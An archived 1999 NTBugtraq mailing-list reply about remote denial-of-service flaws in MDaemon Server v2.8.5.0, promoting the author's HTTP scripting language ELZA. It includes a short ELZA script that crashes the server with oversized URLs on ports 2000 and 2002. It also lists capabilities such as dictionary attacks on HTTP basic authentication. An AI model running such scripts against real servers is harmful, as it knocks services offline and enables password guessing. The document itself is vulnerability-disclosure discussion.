OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
NTBugtraq And NTSecurity Archives: Re: Multiples Remotes DoS At

Re: Multiples Remotes DoS Attacks in MDaemon Server v2.8.5.0Vulnerability

Philip Stoev (philipEINET.BG)
Wed, 24 Nov 1999 22:12:25 +0200

Recently, it occured to me that it is by no means necessary to compile a
binary for every such DoS, even if it can not be performed with telnet or
netcat.

So, I wrote a script language for automating HTTP requests. The interpreter
can be obtained from http://phiphi.hypermart.net. Please give it a try.
Feedback to philip_stoeviname.com is very welcome.

This DoS would look like this written in ELZA:

        var onerror = continue
        subst SERVER ? 127.0.0.1
        subst BIGURL > 1000
        get url http://SERVER:2000/BIGURL
        get url http://SERVER:2002/BIGURL

The language has the following abilities as well:

- Extraction of _dynamic_ URLs from links, frames, layers, image maps,
applet parameters and other HTML elements, based on _static_ attributes of
those elements, such as name, sequence number or the text visible to the
user.
- Handling of forms, passing custom form fields and field values,
collecting hidden form fields;
- Following redirects and refreshes;
- Proper handling of cookies, honoring their Path and Domain attributes;
- HTTP Referer, User-Agent, and other HTTP headers for perfec mimcry;
- Handling HTTP basic authorization including dictionary attacks;
- Looping for repeated requesting or dictionary attacks;
- Conditional execution;
- HTTPS communication via a SSL tunnel;

Scripts written in ELZA can be executed remotely via POST or forked for
load generation.

Take care,

Philip

This archive was generated by hypermail 2.0b3 on Wed Nov 24 1999 - 15:32:28 CST